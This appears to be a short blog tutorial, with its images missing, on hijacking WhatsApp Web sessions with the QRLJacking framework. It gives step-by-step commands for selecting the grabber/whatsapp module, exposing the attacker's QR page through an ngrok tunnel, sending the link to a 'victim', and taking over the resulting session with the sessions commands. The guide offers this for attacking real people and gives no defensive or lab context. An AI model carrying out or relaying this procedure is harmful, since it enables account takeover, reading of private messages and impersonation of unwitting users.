Whatsapp Session Hijacking using QRLJacking Framework
![]() |
Setting Up Terminal For QRLJacking
If permission access denied to change mode
Now the Framework Opened & run the modules
Using show command to check module available & use command used to run that module
Now only one module grabber/whatsapp
options command to check input options
set host youripaddress [ only for LAN ] or
set host localhost [ Run Ngrok on another terminal tab ]
Open ngrok terminal and copy the ngrok link send to your victim
Now the victim scan the attacker's QR code at the time whatsapp session hijacked successfully
Now interact with hijacked sessions
sessions [ to listing sessions with Id ]
sessions -i Id [ Eg: sessions -i 0 ]
Now automatically web.whatsapp.com open on new browser windows and victim whatsapp loading
0 Comments